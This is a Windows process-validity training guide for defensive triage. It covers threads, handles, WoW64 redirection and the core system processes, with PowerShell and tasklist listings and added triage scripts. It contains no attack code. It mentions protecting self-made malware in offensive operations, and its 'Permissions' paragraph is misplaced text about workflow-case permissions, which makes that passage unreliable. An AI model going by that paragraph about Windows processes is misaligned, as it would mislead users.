# Windows Process Validity Primer Guide

Terminal Learning Objectives:

1. Define what a process is and its purpose
2. Explain the function of a thread
3. Describe process priorities and how they are assigned
4. Demonstrate the ability to use GUI and command line tools to view, manage and enumerate processes
5. Perform system and user characterization using a process list
6. Explain system processes such as idle, Session Manager Subsystem Service (SMSS) and logon
7. Locate folders that contain x86 and x64 binaries
8. Explain SysWOW64 file redirection
9. Describe key differences in operating system processes between common versions of Windows
10. Explain parent-child relationships between processes and how this impacts the context in which a process runs
11. Demonstrate the ability to conduct malware triage on a process list

Table of Contents

1. What is a Process?
    - 1.1 Threads/Handles
2. SysWOW64 and File System Redirector
3. Process Validity
    - 3.1 What is Process Validity?
    - 3.2 Why is Process Validity Important?
4. Processes, DLLs, and Services
    - 4.1 What are they?
    - 4.2 How to view Processes and DLLs
        - 4.2.1 View Processes In PowerShell
        - 4.2.2 View Processes in Command Prompt
        - 4.2.3 View Processes in the GUI
    - 4.3 How to View Services
        - 4.3.1 View Services in PowerShell
        - 4.3.2 View Services in Command Prompt
        - 4.3.3 View Services in the GUI
5. Scheduled Tasks
    - 5.1 What are Scheduled Tasks?
    - 5.2 How to view Scheduled tasks
        - 5.2.1 View Scheduled Tasks In PowerShell
        - 5.2.2 View Scheduled Tasks In Command Prompt
        - 5.2.3 View Scheduled Tasks in the GUI
        - 5.2.4 Autorun Registry Locations
    - 5.3 DEMO: Create Task to open listening Port via the PowerShell Process.
        - 5.3.1 Create IchBinBosh task
        - 5.3.2 Confirm IchBinBosh exists and View Properties
6. Network Connections
    - 6.1 View Network Connections In PowerShell
    - 6.2 View Network Connections in Command Prompt
    - 6.3 View Network Connections in the GUI
7. Identifying Abnormalities/Suspicious Activity
    - 7.1 Demo: Manipulating SMPhost Service and Parameters
    - 7.2 Demo: Service configuration post-modification behavior
8. Scheduled Tasks

## Net Use SysInternals

```cmd
net use * \\live.sysinternals.com\Tools\
xcopy /s z:\ c:\sysinternals\
net use z: /d
```

For PowerShell:

```powershell
net use * http://live.sysinternals.com
```

## Introduction

A process holds the virtual address space and executable code, along with other resources, that a program needs in order to run. Every application in the Windows operating system consists of one or more processes. We will take a look at some of the processes on a system using the GUI, the command line, and PowerShell.

## 1. What is a Process?

TLOs: 1, 2, 3

A process is an instance of executable code running on a system: a program that is executing. Examples include:

- Background tasks like a spell checker
- Executables like Google Chrome and Notepad

### Process IDs (PID)

When a process is created, it is assigned a PID to uniquely identify the active process. The PID for most processes is the next PID available, assigned in multiples of four. The System process is different in that its PID is constant for the variant of the OS. For example, on a modern Windows OS the PID of the System process is always 4, regardless of how many times the system has been restarted. The PID for the IE process, on the other hand, is different each time it is launched. The PID may be used as a parameter in various function calls, allowing a process to be manipulated, such as adjusting the process's priority or killing it altogether.

### Process Priorities

Process priority is the importance that is given to each process in Windows. When your operating system is running multiple programs (or just background services) simultaneously, it is actually shuffling among them.
The process's priority determines the precedence its threads have for being scheduled onto a processor: a process with a higher priority is assigned a processor before a process with a lower priority. It also gives preemptive power, taking a processor away from a currently running lower-priority process. There are six priority levels available to processes in Windows:

- Low/Idle
- Below normal
- Normal
- Above normal
- High
- Realtime

Normal is the default level. Most apps start with this priority level and run without issues. The user can temporarily change a process's priority to speed the app up, or to slow it down and make it consume fewer resources. A new priority level applied to the app takes effect until the app's process terminates. Once you exit it, the next time it will open with the default priority level (Normal), unless the app itself has a setting to change its priority automatically.

Show how to change the process priority in Task Manager:

Open Task Manager → click the Details tab → right-click "Notepad" → choose "Set Priority"

### 1.1 Threads/Handles

#### Threads

A thread is the unit of execution within a process, the basic unit to which the operating system allocates processor time. A process can have anywhere from one thread to many threads.

- Single-threaded = one instruction, one thing happening, at a time
- Multi-threaded = multiple instructions, accomplishing a number of things at the same time

DEMO: Start notepad.exe (multi-threaded process) and cmd.exe (single-threaded) from the command line and leave them in the background.

```powershell
# Show the threads associated with notepad.
# Point out that the threads are sets of instructions running along with notepad.
get-process -name notepad
get-process -id 328 | select-object -expandproperty threads
get-process -id 328 | Select-Object -ExpandProperty threads | select id

# Show the single thread for cmd (note: multiple cmd processes may appear,
# but their threads should be in "Wait" status or stopping).
get-process -name cmd
(Get-Process -name cmd).threads
```

```text
PS C:\windows\system32> get-process -name notepad

Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
-------  ------    -----      -----     ------     --  -- -----------
    244      13     2644      16112       0.23    328   2 notepad

PS C:\windows\system32> get-process -id 328 | select-object -expandproperty threads

BasePriority            : 8
CurrentPriority         : 10
Id                      : 8128
IdealProcessor          :
PriorityBoostEnabled    :
PriorityLevel           :
PrivilegedProcessorTime :
StartAddress            : 0
StartTime               :
ThreadState             : Wait
TotalProcessorTime      :
UserProcessorTime       :
WaitReason              : UserRequest
ProcessorAffinity       :
Site                    :
Container               :

PS C:\windows\system32> get-process -name cmd

Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
-------  ------    -----      -----     ------     --  -- -----------
     70       5     2032       3504       0.03   3984   2 cmd
     76       5     2272       3800       0.02   7196   2 cmd
    266      16     4944      17996       0.34   8180   2 cmd

PS C:\windows\system32> (Get-Process -name cmd).threads

BasePriority            : 8
CurrentPriority         : 9
Id                      : 3816
IdealProcessor          :
PriorityBoostEnabled    :
PriorityLevel           :
PrivilegedProcessorTime :
StartAddress            : 140709990605360
StartTime               :
ThreadState             : Wait
TotalProcessorTime      :
UserProcessorTime       :
WaitReason              : Executive
ProcessorAffinity       :
Site                    :
Container               :

BasePriority            : 8
CurrentPriority         : 9
Id                      : 7468
IdealProcessor          :
PriorityBoostEnabled    :
PriorityLevel           :
PrivilegedProcessorTime :
StartAddress            : 140709990605360
StartTime               :
ThreadState             : Wait
TotalProcessorTime      :
UserProcessorTime       :
//==OUTPUT TRUNCATED==//
```

#### Handles

A handle is a reference to an object the process is interacting with, such as a file on the file system. When a thread opens a file, it establishes a "handle" to the file; internally the handle acts like a "name" for that instance of the file. Handles are used to link to transitory or environmental resources outside the process's memory structure.
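The following is an added example, not part of the primer: it pulls together the priority class, thread count, handle count and per-thread state discussed above into one listing, so that a single-threaded process (one thread, the rest of any extra threads in Wait) and any process running above Normal priority stand out. The function names are the example's own; `PriorityClass`, `Threads`, `ThreadState` and `WaitReason` are the real .NET `System.Diagnostics.Process` and `ProcessThread` members that `Get-Process` exposes.

```powershell
# Added example (not from the primer): summarise processes by priority class,
# thread count, handle count and the states of their threads.
function Get-ProcessThreadSummary {
    param([string[]]$Name = '*')
    foreach ($p in Get-Process -Name $Name) {
        # PriorityClass needs a process handle; protected/system processes deny it.
        try { $priority = [string]$p.PriorityClass } catch { $priority = 'n/a' }
        $states = @{}
        foreach ($t in $p.Threads) {
            $key = [string]$t.ThreadState
            # WaitReason is only valid (and only readable) while the thread is waiting.
            if ($key -eq 'Wait') { $key = "Wait/$($t.WaitReason)" }
            $states[$key] = 1 + [int]$states[$key]
        }
        [pscustomobject]@{
            Id            = $p.Id
            Name          = $p.ProcessName
            Session       = $p.SessionId
            PriorityClass = $priority
            BasePriority  = $p.BasePriority
            Threads       = $p.Threads.Count
            Handles       = $p.HandleCount
            ThreadStates  = ($states.GetEnumerator() | Sort-Object Name |
                             ForEach-Object { "$($_.Name)=$($_.Value)" }) -join ' '
        }
    }
}

# Lowering a process's priority from PowerShell: the same effect as Task
# Manager's "Set Priority", and it resets to Normal the next time the program starts.
function Set-ProcessPriorityBelowNormal {
    param([Parameter(Mandatory)][string]$Name)
    foreach ($p in Get-Process -Name $Name) {
        $p.PriorityClass = [System.Diagnostics.ProcessPriorityClass]::BelowNormal
        "$($p.ProcessName) ($($p.Id)) now $($p.PriorityClass)"
    }
}

# The two processes from the demo above:
Get-ProcessThreadSummary -Name notepad, cmd | Format-Table -AutoSize

# Processes running at High or RealTime deserve a second look; few user programs need it.
Get-ProcessThreadSummary | Where-Object { $_.PriorityClass -in 'High', 'RealTime' } | Format-Table -AutoSize
```

The per-thread `ThreadStates` column is what makes the demo's point visible without reading each thread record: a cmd.exe sitting at a prompt shows one thread in `Wait/Executive`, while notepad shows several waiting on different reasons.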
#### Permissions

The limitations that are set on what a process can perform. Process permissions are designed to give users or groups read-only access to cases and their objects (DynaForms, Input Documents and Output Documents). By default, only the user currently designated to work on a case can open the case. To allow other users to see (but not change) the data in cases, they need to be assigned process permissions to the process and its objects. Process permissions are designed to offer advanced control over how users access cases and what information they can view at specified tasks during the case.

## 2. SysWOW64 and File System Redirector

TLOs: 7, 8

A 64-bit Windows OS has both a SysWOW64 folder and a System32 folder. These folders contain OS files and application DLLs. 64-bit Windows includes WoW64, an operating system sub-system that runs 32-bit applications on a 64-bit OS. On 64-bit Windows, when a 32-bit application attempts to access the 32-bit %windir% directories, it is redirected to the SysWOW64 path. When a 32-bit application attempts to access %windir%\System32, %windir%\lastgood\system32, or %windir%\regedit.exe, the application is redirected to the paths detailed in the table below:

| Original Path | Redirected Path for 32-bit (x86) Processes |
|---|---|
| %windir%\System32 | %windir%\SysWOW64 |
| %windir%\lastgood\system32 | %windir%\lastgood\SysWOW64 |
| %windir%\regedit.exe | %windir%\SysWOW64\regedit.exe |

There are known vulnerabilities involving classic stack overflows with memory corruption exploits that focus on 32-bit stack overflows running under WoW64. More is explained at the following link: Windows Memory Corruption Exploits

## 3. Process Validity

### 3.1 What is Process Validity?

Being able to distinguish a process as known good from possibly bad based on its attributes and characteristics, whether that is something as simple as its name and hash, or something more in depth such as its threads and handles.
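An added example, not from the primer, that makes the redirection above observable on a live system. It answers two questions a triage pass needs: which running processes are 32-bit processes under WoW64 (and therefore see SysWOW64 when they ask for System32), and whether the PowerShell host you are typing into is itself being redirected. It calls the documented kernel32 `IsWow64Process` API through P/Invoke; the function names and the output object layout are the example's own.

```powershell
# Added example (not from the primer): list processes running under WoW64.
# Add-Type -MemberDefinition supplies the System and InteropServices usings.
Add-Type -Namespace Win32 -Name Wow64 -MemberDefinition @'
[DllImport("kernel32.dll", SetLastError = true)]
[return: MarshalAs(UnmanagedType.Bool)]
public static extern bool IsWow64Process(IntPtr hProcess,
    [MarshalAs(UnmanagedType.Bool)] out bool wow64Process);
'@

function Get-ProcessBitness {
    foreach ($p in Get-Process) {
        $isWow64 = 'access denied'   # protected and system processes refuse the handle
        $path    = $null
        try {
            $flag = $false
            # .Handle opens the process with the rights the caller has.
            if ([Win32.Wow64]::IsWow64Process($p.Handle, [ref]$flag)) { $isWow64 = $flag }
            $path = $p.MainModule.FileName
        } catch { }
        [pscustomobject]@{
            Id    = $p.Id
            Name  = $p.ProcessName
            Wow64 = $isWow64
            Path  = $path
        }
    }
}

# Which System32 does this PowerShell instance actually see? From a 32-bit
# host, %windir%\System32 lands in SysWOW64, and the Sysnative alias is the
# documented way for a WoW64 process to reach the real 64-bit System32.
function Get-RedirectionView {
    [pscustomobject]@{
        HostIs64Bit     = [Environment]::Is64BitProcess
        OsIs64Bit       = [Environment]::Is64BitOperatingSystem
        System32        = "$env:windir\System32"
        SysnativeExists = Test-Path "$env:windir\Sysnative"   # only true inside a WoW64 process
    }
}

Get-RedirectionView
# 32-bit processes: expect their Path to point at Program Files (x86) or SysWOW64.
Get-ProcessBitness | Where-Object { $_.Wow64 -eq $true } | Format-Table -AutoSize
```

For triage, the interesting rows are the mismatches: a process reported as WoW64 whose image sits under `%windir%\System32`, or a 64-bit process whose image sits under `SysWOW64`, both deserve a closer look at the binary and its signature.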
Today's malware typically uses stealth and obfuscation to hide in various artifacts such as:

- processes
- files
- registry keys
- drivers
- etc.

It tries to leave as little evidence of its presence as possible by mimicking, or by hooking onto, legitimate processes or services.

### 3.2 Why is Process Validity Important?

OCO - Offensive Operations

- We need to protect our toolset (malware we've created).
- Find any other types of malware on the box that could compromise our tools.

DCO - Defensive Operations

- Find malware and defend our networks.
- Make sure we are not compromised and do not have sensitive information stolen from us.
- Could be the difference between life and death for soldiers on mission.

## 4. Processes, DLLs, and Services

### 4.1 What are they?

What is a Process?

A program running on your computer, whether executed by the user or running in the background. Examples include:

- Background tasks like a spell checker
- Executables like Google Chrome and Notepad

What is a DLL?

Dynamic Link Library

- A non-standalone program that can be run by (linked to) multiple programs at the same time.
- Cannot be directly executed. Dependent on an exe to use as an entry point, such as RUNDLL.EXE (a process that calls on the functionality of the DLL).
- Allows developers to make minor changes without affecting other parts of the program.

Some examples include:

- Comdlg32 - performs common dialog box related functions.
- Device drivers
- ActiveX Controls

If you want to dig deeper: Ask Microsoft

What is a Service?

Windows Services are a core component of the Microsoft Windows operating system that start when the computer is booted and run in the background. Windows Services can start without user intervention and may continue to run long after the user has logged off. Developers can create services by creating applications that are installed as a service.

- Long-running executables that run in their own Windows sessions (i.e. in the background)
- Can be set to auto start when the computer boots or a user logs on.
- Can be paused and restarted.
- Do not require user interaction or show any user interface.
- Can be used to handle low-level tasks

If you want to dig deeper: Ask Microsoft

### 4.2 How to view Processes and DLLs

Q: Which Windows commands let us view processes?

- PowerShell: Get-Process - Microsoft Reference
- CMD: tasklist

#### 4.2.1 View Processes In PowerShell

View all processes, not sorted.

```powershell
Get-Process
```

```text
PS C:\Users\student> Get-Process

Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
-------  ------    -----      -----     ------     --  -- -----------
    278      18     9420      18984       3.61   6304   1 ApplicationFrameHost
    342      19     4516       3988              4624   0 armsvc
    958      57   127900     202620      51.38    632   1 atom
    572      82   182356     266836     117.64   3148   1 atom
    321      33    92760     164644       0.56   7864   1 atom
    222      15     6884      28916       0.03   8024   1 atom
    733      27   143268     172480      38.33  13980   1 atom
     68       5     2040       4128       0.02   7504   1 cmd
//==OUTPUT TRUNCATED==//
```

View all processes, sorted by PID.

```powershell
Get-Process | Sort -Property Id | more
```

```text
PS C:\Users\student> Get-Process | Sort -Property Id | more

Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
-------  ------    -----      -----     ------     --  -- -----------
      0       0       60          8                 0   0 Idle
   4240       0      192         96                 4   0 System
      0       0      184      22332                72   0 Secure System
      0      17     6552      28656               132   0 Registry
    168      11     1432       3484               452   0 wininit
     53       3     1056        940               504   0 smss
//==OUTPUT TRUNCATED==//
```

View all processes, sorted by PID, showing only the properties I define.
```powershell
Get-Process | Select Name, Id, Description | Sort -Property Id | more
```

```text
PS C:\Users\student> Get-Process | Select Name, Id, Description | Sort -Property Id | more

Name            Id Description
----            -- -----------
Idle             0
System           4
Secure System   72
Registry       132
wininit        452
smss           504
LsaIso         572
csrss          576
svchost        624
atom           632 Atom
svchost        852
rundll32      1616 Windows host process (Rundll32)
CompPkgSrv    1788 Component Package Support Server
Slack         1816 Slack
//==OUTPUT TRUNCATED==//
```

View only the processes I define, sorted by PID.

```powershell
Get-Process SMSS,CSRSS,LSASS | Sort -Property Id
```

```text
PS C:\Users\student> Get-Process SMSS,CSRSS,LSASS | Sort -Property Id

Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
-------  ------    -----      -----     ------     --  -- -----------
     53       3     1056        940               504   0 smss
    717      33     3684       3688               576   1 csrss
    784      24     1928       2788               876   0 csrss
   1612      39    10352      18076              1028   0 lsass
```

View the modules/DLLs used by a defined process and their file locations. Either form works; the second is the idiomatic one.

```powershell
Get-Process chrome | ForEach-Object { $_.Modules } | more
Get-Process -Name "*chrome*" | Select-Object -ExpandProperty Modules | more
```

```text
PS C:\Users\student> Get-Process chrome | ForEach-Object { $_.Modules } | more

   Size(K) ModuleName       FileName
   ------- ----------       --------
      2244 chrome.exe       C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
      2008 ntdll.dll        C:\WINDOWS\SYSTEM32\ntdll.dll
       756 KERNEL32.DLL     C:\WINDOWS\System32\KERNEL32.DLL
      2852 KERNELBASE.dll   C:\WINDOWS\System32\KERNELBASE.dll
      1016 chrome_elf.dll   C:\Program Files (x86)\Google\Chrome\Application\88.0.4324...
        40 VERSION.dll      C:\WINDOWS\SYSTEM32\VERSION.dll
//==OUTPUT TRUNCATED==//
```

View only the modules/DLLs used by Chrome that have "chrome" in the name, with their file locations.

```powershell
Get-Process chrome | ForEach-Object { $_.Modules } | Where-Object ModuleName -like '*chrome*' | more
Get-Process -Name "*chrome*" | Select-Object -ExpandProperty Modules | Where-Object ModuleName -like '*chrome*' | more
```

Pipe into `ft -wrap` to see the full file name/path.
```text
PS C:\Users\student> Get-Process chrome | ForEach-Object { $_.Modules } | Where-Object ModuleName -like '*chrome*' | more

   Size(K) ModuleName       FileName
   ------- ----------       --------
      2244 chrome.exe       C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
      1016 chrome_elf.dll   C:\Program Files (x86)\Google\Chrome\Application\88.0.4324...
      2244 chrome.exe       C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
      1016 chrome_elf.dll   C:\Program Files (x86)\Google\Chrome\Application\88.0.4324...
    152776 chrome.dll       C:\Program Files (x86)\Google\Chrome\Application\88.0.4324...
//==OUTPUT TRUNCATED==//
```

View an instance of all Win32 (system) services.

```powershell
Get-CimInstance Win32_Service | Select Name, ProcessId, PathName | more
```

Pipe into `ft -wrap` to see the full file name/path.

```text
PS C:\Users\student> Get-CimInstance Win32_Service | Select Name, ProcessId, PathName | ft -wrap | more

Name                 ProcessId Pathname
----                 --------- --------
AdobeARMservice           4624 "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
AJRouter                     0 C:\WINDOWS\system32\svchost.exe -k LocalServiceNetworkRestricted -p
ALG                          0 C:\WINDOWS\System32\alg.exe
AppIDSvc                     0 C:\WINDOWS\system32\svchost.exe -k LocalServiceNetworkRestricted -p
Appinfo                   7752 C:\WINDOWS\system32\svchost.exe -k netsvcs -p
AppReadiness                 0 C:\WINDOWS\System32\svchost.exe -k AppReadiness -p
AppXSvc                  13292 C:\WINDOWS\system32\svchost.exe -k wsappx -p
AudioEndpointBuilder      3168 C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted -p
Audiosrv                  3920 C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted -p
autotimesvc                  0 C:\WINDOWS\system32\svchost.exe -k autoTimeSvc
AxInstSV                     0 C:\WINDOWS\system32\svchost.exe -k AxInstSVGroup
BDESVC                    1628 C:\WINDOWS\System32\svchost.exe -k netsvcs -p
BFE                       3908 C:\WINDOWS\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p
BITS                         0 C:\WINDOWS\System32\svchost.exe -k netsvcs -p
BrokerInfrastructure      1172 C:\WINDOWS\system32\svchost.exe -k DcomLaunch -p
//==OUTPUT TRUNCATED==//
```

#### 4.2.2 View Processes in Command Prompt
View all processes.

```cmd
tasklist
```

```text
C:\Users\student> tasklist | more

Image Name                     PID Session Name        Session#    Mem Usage
========================= ======== ================ =========== ============
System Idle Process              0 Services                   0          8 K
System                           4 Services                   0         96 K
Secure System                   72 Services                   0     22,332 K
Registry                       132 Services                   0     28,948 K
smss.exe                       504 Services                   0        940 K
csrss.exe                      876 Services                   0      2,800 K
wininit.exe                    452 Services                   0      3,484 K
csrss.exe                      576 Console                    1      3,648 K
winlogon.exe                   916 Console                    1      6,204 K
services.exe                   976 Services                   0      6,996 K
-- More --
```

Display verbose task information in the output.

```cmd
tasklist /v
```

```text
C:\Users\student> tasklist /v | more

Image Name                     PID Session Name        Session#    Mem Usage Status          User Name                                              CPU Time Window Title
========================= ======== ================ =========== ============ =============== ================================================== ============ ===============
System Idle Process              0 Services                   0          8 K Unknown         NT AUTHORITY\SYSTEM                                  1628:26:24 N/A
System                           4 Services                   0         96 K Unknown         N/A                                                     0:44:21 N/A
Secure System                   72 Services                   0     22,332 K Unknown         N/A                                                     0:00:00 N/A
Registry                       132 Services                   0     37,948 K Unknown         N/A                                                     0:00:12 N/A
smss.exe                       504 Services                   0        940 K Unknown         N/A                                                     0:00:00 N/A
csrss.exe                      876 Services                   0      2,908 K Unknown         N/A                                                     0:00:06 N/A
wininit.exe                    452 Services                   0      3,488 K Unknown         N/A                                                     0:00:00 N/A
-- More --
```

Display service information for each process without truncation.

```cmd
tasklist /svc
```

```text
C:\Users\student> tasklist /svc

Image Name                     PID Services
========================= ======== ============================================
System Idle Process              0 N/A
System                           4 N/A
Secure System                   72 N/A
Registry                       132 N/A
smss.exe                       504 N/A
csrss.exe                      876 N/A
wininit.exe                    452 N/A
csrss.exe                      576 N/A
winlogon.exe                   916 N/A
services.exe                   976 N/A
LsaIso.exe                     572 N/A
lsass.exe                     1028 EFS, KeyIso, SamSs, VaultSvc
svchost.exe                   1172 BrokerInfrastructure, DcomLaunch, PlugPlay,
                                   Power, SystemEventsBroker
//==OUTPUT TRUNCATED==//
```

Handles or DLLs a process is using: display the modules/DLLs associated with all processes.

```cmd
tasklist /m | more
```

```text
C:\Users\student> tasklist /m | more

Image Name                     PID Modules
========================= ======== ============================================
System Idle Process              0 N/A
System                           4 N/A
Secure System                   72 N/A
Registry                       132 N/A
smss.exe                       504 N/A
csrss.exe                      876 N/A
wininit.exe                    452 N/A
csrss.exe                      576 N/A
winlogon.exe                   916 N/A
services.exe                   976 N/A
LsaIso.exe                     572 N/A
lsass.exe                     1028 N/A
svchost.exe                   1160 N/A
sihost.exe                    4720 ntdll.dll, KERNEL32.DLL, KERNELBASE.dll,
                                   msvcp_win.dll, ucrtbase.dll, combase.dll,
                                   RPCRT4.dll, sechost.dll, advapi32.dll,
                                   msvcrt.dll, CoreMessaging.dll, WS2_32.dll,
                                   ntmarta.dll, kernel.appcore.dll,
-- More --
```

Display the modules/DLLs associated with a specific process.

```cmd
tasklist /m /fi "IMAGENAME eq chrome.exe"
```

```text
C:\Users\student> tasklist /m /fi "IMAGENAME eq chrome.exe" | more

Image Name                     PID Modules
========================= ======== ============================================
chrome.exe                    8260 ntdll.dll, KERNEL32.DLL, KERNELBASE.dll,
                                   chrome_elf.dll, VERSION.dll, msvcrt.dll,
                                   ADVAPI32.dll, sechost.dll, RPCRT4.dll,
                                   CRYPTBASE.DLL, bcryptPrimitives.dll,
                                   ntmarta.dll, ucrtbase.dll, user32.dll,
                                   win32u.dll, GDI32.dll, gdi32full.dll,
                                   msvcp_win.dll, IMM32.DLL, SHELL32.dll,
                                   windows.storage.dll, combase.dll, Wldp.dll,
                                   SHCORE.dll, shlwapi.dll, chrome.dll,
-- More --
```

Formatting options.

```cmd
tasklist /fo:{table|list|csv}
```

```text
C:\Users\student> tasklist /fo:table | more

Image Name                     PID Session Name        Session#    Mem Usage
========================= ======== ================ =========== ============
System Idle Process              0 Services                   0          8 K
System                           4 Services                   0         96 K
Secure System                   72 Services                   0     22,332 K
Registry                       132 Services                   0     37,876 K
smss.exe                       504 Services                   0        964 K
csrss.exe                      876 Services                   0      2,940 K
wininit.exe                    452 Services                   0      3,712 K
-- More --

C:\Users\student> tasklist /fo:list | more

Image Name:   System Idle Process
PID:          0
Session Name: Services
Session#:     0
Mem Usage:    8 K

Image Name:   System
PID:          4
Session Name: Services
Session#:     0
Mem Usage:    96 K

Image Name:   Secure System
PID:          72
Session Name: Services
Session#:     0
Mem Usage:    22,332 K
-- More --

C:\Users\student> tasklist /fo:csv | more
"Image Name","PID","Session Name","Session#","Mem Usage"
"System Idle Process","0","Services","0","8 K"
"System","4","Services","0","96 K"
"Secure System","72","Services","0","22,332 K"
"Registry","132","Services","0","37,876 K"
"smss.exe","504","Services","0","964 K"
"csrss.exe","876","Services","0","2,940 K"
"wininit.exe","452","Services","0","3,712 K"
"csrss.exe","576","Console","1","4,948 K"
"winlogon.exe","916","Console","1","6,600 K"
"services.exe","976","Services","0","7,636 K"
-- More --
```

Filtering for a specific string/process.

```cmd
tasklist /fi "IMAGENAME eq lsass.exe"
```

```text
C:\Users\student>tasklist /fi "IMAGENAME eq lsass.exe"

Image Name                     PID Session Name        Session#    Mem Usage
========================= ======== ================ =========== ============
lsass.exe                     1028 Services                   0     17,984 K
```

#### 4.2.3 View Processes in the GUI

Task Manager (Microsoft default): real-time monitoring of processes and services.

Open Notepad and put it in the background. View Processes → expand an "App" to view the instances running → right-click → select "Bring to front" → you can also choose "End task".

Procexp.exe (Sysinternals tools): Microsoft Reference

### 4.3 How to View Services

Windows Services Control Manager (SCM)

Services are managed through the Services Control Manager, which shows a list of each service's name, description, status and type. You can change the status (Stop, Pause, Start, Delay Start or Resume) and modify the start mechanism (Manual or Automatic) of all services using SCM. Windows Services can mostly be grouped into three categories depending on the actions and applications they are associated with: Local Services, Network Services and System Services. System Services are those that start when the computer is booted and run in the background without user interaction.
| System Process | Description |
|---|---|
| idle | Though not a real process, its purpose is to count the number of cycles in which the processor(s) are not doing anything. |
| system | This process represents the kernel process (ntoskrnl.exe). |
| smss | The Session Manager Subsystem Service, or the smss.exe process, creates and manages the various sessions on the system, as well as finalizing system initialization and starting wininit.exe and winlogon.exe. |
| csrss | The user-mode portion of the Windows Subsystem. |
| wininit | wininit.exe is the Session Zero (0) initialization process. It runs in session 0 (the OS's session) only. It starts any auto-start devices and drivers applicable to Session 0 and launches lsass.exe. |
| winlogon | The Interactive Logon Manager. An instance of it runs in every session above zero (0). Its purpose is to coordinate all logon activities and security-related functions within its session, and to launch services.exe. |
| services | The Service Control Manager (SCM) is responsible for starting all auto-start devices and drivers applicable to its session. |
| lsass | The Local Security Authority Subsystem Service, or the lsass.exe process, runs in Session 0. It performs all logon functions, including user authentication, verifying the user's access, and creating the user's access token. |
| lsm | The Local Session Manager, or the lsm.exe process, also runs in Session 0. Its purpose is to manage all connections related to terminal server and to monitor all other sessions. If it detects an unstable state in any of the system's sessions above Session 0, it signals SMSS to terminate the session. |

Extra instances of a process that should exist only once, or only in a set number, are an indicator of abnormal behavior. One LSASS, one SMSS, and at least two CSRSS are good examples. SI = Session Identifier: system-level processes should have 0, and the second CSRSS (and any further ones) will have 1, 2, etc.
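An added example, not from the primer, that turns the table above into a repeatable triage pass: it checks that the single-instance processes occur exactly once and in session 0, that each core image runs from %windir%\System32, and who the parent of each one is, using `Win32_Process.ParentProcessId`. The parent expectations are an assumption stated for Windows Vista and later (wininit.exe starts services.exe and lsass.exe in session 0; csrss.exe, wininit.exe and winlogon.exe are started by a copy of smss.exe that exits afterwards, so they should have no live parent; svchost.exe comes from services.exe); adjust the table for the build under review. The function name is the example's own. Run it elevated so that `ExecutablePath` is readable for session-0 processes.

```powershell
# Added example (not from the primer): sanity-check the core system processes.
function Get-SystemProcessTriage {
    $procs = Get-CimInstance Win32_Process
    $byId  = @{}
    foreach ($p in $procs) { $byId[[int]$p.ProcessId] = $p }

    # Expected parent image name(s); an empty list means "parent should have exited".
    $expectedParent = @{
        'smss.exe'     = @('System')
        'csrss.exe'    = @()
        'wininit.exe'  = @()
        'winlogon.exe' = @()
        'services.exe' = @('wininit.exe')
        'lsass.exe'    = @('wininit.exe')
        'svchost.exe'  = @('services.exe')
    }
    $singletons = 'smss.exe', 'wininit.exe', 'services.exe', 'lsass.exe'

    $findings = @()
    foreach ($name in $singletons) {
        $n = @($procs | Where-Object Name -eq $name).Count
        if ($n -ne 1) { $findings += "expected exactly 1 $name, found $n" }
        foreach ($p in $procs | Where-Object { $_.Name -eq $name -and $_.SessionId -ne 0 }) {
            $findings += "$name (PID $($p.ProcessId)) is in session $($p.SessionId), expected 0"
        }
    }

    foreach ($p in $procs | Where-Object { $expectedParent.ContainsKey($_.Name) }) {
        $tag = "$($p.Name) (PID $($p.ProcessId))"

        # All of these images live in %windir%\System32; a 32-bit svchost.exe from
        # SysWOW64 will be listed here too and should simply be verified.
        $expectedPath = Join-Path $env:windir "System32\$($p.Name)"
        if ($p.ExecutablePath -and $p.ExecutablePath -ne $expectedPath) {
            $findings += "$tag runs from $($p.ExecutablePath), expected $expectedPath"
        }

        $parent  = $byId[[int]$p.ParentProcessId]
        $allowed = $expectedParent[$p.Name]
        if ($allowed.Count -gt 0) {
            if (-not $parent -or $parent.Name -notin $allowed) {
                $seen = if ($parent) { $parent.Name } else { '<exited>' }
                $findings += "$tag parent is $seen, expected $($allowed -join ' or ')"
            }
        } elseif ($parent) {
            # A live parent here is usually PID reuse, but it is also what an
            # impostor started from a shell or a user-mode launcher looks like.
            $findings += "$tag has a live parent $($parent.Name) (PID $($parent.ProcessId)); the smss.exe that starts it normally exits"
        }
    }
    return $findings
}

$result = @(Get-SystemProcessTriage)
if ($result.Count -eq 0) { 'No deviations from the expected system-process layout.' } else { $result }
```

Each finding is a lead, not a verdict: PID reuse and 32-bit service hosts produce benign entries, which is exactly why the output names the PID and path, so the next step (hash, signature, loaded modules) can be taken on the specific process.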
For example, the three processes just mentioned as seen with Get-Process:

```text
PS C:\windows\system32> Get-Process SMSS,CSRSS,LSASS | Sort -Property Id

Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
-------  ------    -----      -----     ------     --  -- -----------
     56       3      492        376               308   0 smss
    509      19     1656       1548               428   0 csrss
    168       9     1560       1332               512   1 csrss
   1353      23     6780      10536               660   0 lsass
    437      19     1688       2240              5000   2 csrss
```

Table 1. The above output explained by column

| Column | Defined |
|---|---|
| Handles | The number of handles that the process has opened: objects the process is interacting with on the file system |
| NPM(K) | The amount of non-paged memory that the process is using, in kilobytes |
| PM(K) | The amount of pageable memory that the process is using, in kilobytes |
| WS(K) | The size of the working set of the process, in kilobytes. The working set consists of the pages of memory that were recently referenced by the process |
| VM(M) | The amount of virtual memory that the process is using, in megabytes. Virtual memory includes storage in the paging files on disk |
| CPU(s) | The amount of processor time that the process has used on all processors, in seconds |
| ID | The process ID (PID) of the process |
| SI | Session Identifier |
| ProcessName | The name of the process |

Tools to view information on services

In PowerShell:

- Get-CimInstance - Microsoft Reference
- Get-Service - Microsoft Reference

In Command Prompt:

- net start - shows currently running services
- sc query - Microsoft Reference

#### 4.3.1 View Services in PowerShell

